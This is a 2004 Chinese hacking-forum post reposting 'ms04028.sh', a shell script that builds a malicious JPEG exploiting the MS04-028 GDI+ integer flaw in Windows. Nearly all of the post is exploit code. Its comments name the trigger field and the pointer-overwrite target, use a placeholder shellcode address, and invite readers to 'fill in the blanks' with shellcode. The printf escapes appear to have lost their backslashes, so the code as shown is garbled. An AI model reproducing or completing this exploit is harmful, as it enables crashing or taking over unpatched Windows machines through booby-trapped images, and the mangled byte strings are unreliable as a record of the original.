‹‹ 上一主题 | 下一主题 ››
发新话题
打印

ms04028.sh JPEG vuln

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6825 
精华
834 
积分
36073 
阅读权限
255 
性别
男 
来自
中国 
在线时间
590 小时 
注册时间
2004-6-25 
最后登录
2008-10-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-9-24 01:33  只看该作者

ms04028.sh JPEG vuln

信息来源:自由网络
复制内容到剪贴板
代码:
#!/bin/sh
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
#sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
#- You non-kiddies out there are smart enough to fill in the blanks
#- Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-

#JPEG header 'n stuff
printf "xFFxD8xFFxE0x00x10x4Ax46x49x46"
printf "x00x01x01x01x00x60x00x60x00x00"

#Trigger string - 00 length field (01 works too)
printf "xFFxFEx00x00"

printf "x45x78x69x66x00x00x49x49x2Ax00x08x00"

# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "x1CxF0xFDx7F"

# 1) Opening directly in IE
#Address of shellcode
printf "x41x41x41x41"

#Other stuff
printf "x96x02x00x00x1Ax00x00x00"

# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "x1CxF0xFDx7F";

# 2) MouseOver in IE
#Address of shellcode
printf "x41x41x41x41"

#Comments here
perl -e 'print "A"x1000';

#Image junk here
printf "x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07";
printf "x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14";
printf "x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C";
printf "x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C";
printf "x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D";
printf "x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32";
printf "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32";
printf "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32";
printf "x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22";
printf "x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01";
printf "x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05";
printf "x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02";
printf "x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05";
printf "x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08";
printf "x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17";
printf "x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43";
printf "x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64";
printf "x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85";
printf "x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4";
printf "xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3";
printf "xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1";
printf "xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8";
printf "xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01";
printf "x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A";
printf "x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04";
printf "x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41";
printf "x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23";
printf "x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19";
printf "x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47";
printf "x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68";
printf "x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88";
printf "x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7";
printf "xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6";
printf "xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5";
printf "xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00";
printf "x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F";
printf "xFFxD9";
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题